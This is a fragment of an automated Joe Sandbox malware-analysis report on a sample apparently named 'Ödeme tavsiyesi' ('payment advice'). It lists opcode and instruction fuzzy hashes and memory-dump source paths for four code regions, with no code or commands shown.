        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8e2f7f069743178f43d49f4c7e3752bc0ac548eb13e4a8cacd96ce2135779f5c
        • Instruction ID: 0baa5c2bd4b238cb7134070f1ce6b9728278dd96a7a9641e6f4460dfcfe1516b
        • Opcode Fuzzy Hash: 8e2f7f069743178f43d49f4c7e3752bc0ac548eb13e4a8cacd96ce2135779f5c
        • Instruction Fuzzy Hash: C8E06D3021E241DFE31DAA7495184767FEE9E4A22530240EAF44BCB231F7668C51CBA3
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 125f4fedc21ee4300e3ab4d2ca273038cebd2e0c1b5aca1f6d5b11bd6a4774e3
        • Instruction ID: 42a54dfb2dc0a912c627d2d870506ccbb59413d972e3437fc846aacb69392b7b
        • Opcode Fuzzy Hash: 125f4fedc21ee4300e3ab4d2ca273038cebd2e0c1b5aca1f6d5b11bd6a4774e3
        • Instruction Fuzzy Hash: BFE06531A9C350CFC34DD67890144657BBD7E8A26071740AFF146CB122E76A8C218793
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2ae346f011320fcf113c0f8927613942eb08888a7bf908e74edc291e85f3add2
        • Instruction ID: dc5e9d295de3ce1d43f3ce22f9beeb01c3ecbcc643f5a2c45443dd1f9b065f1c
        • Opcode Fuzzy Hash: 2ae346f011320fcf113c0f8927613942eb08888a7bf908e74edc291e85f3add2
        • Instruction Fuzzy Hash: 61D01735229011DFA25CA668D10446A37AE9B4D26130390A1F00FCB624FB635C21CB93
        Memory Dump Source
        • Source File: 00000000.00000002.3908192885.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1160000_#U00d6deme tavsiyesi.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5704ad6ca584f82ff9ae8208ca49f2a7edf56ceec71389344b3ee6ad2aa04eb4
        • Instruction ID: 6791d78388c89c833024cb816fdf8833038c411c27eada1aa04ea3d87f946409
        • Opcode Fuzzy Hash: 5704ad6ca584f82ff9ae8208ca49f2a7edf56ceec71389344b3ee6ad2aa04eb4
        • Instruction Fuzzy Hash: 35D09234405200CFC78EDF24D5A48613BB8BF0A21439644DDD042CA166D32B6812CB11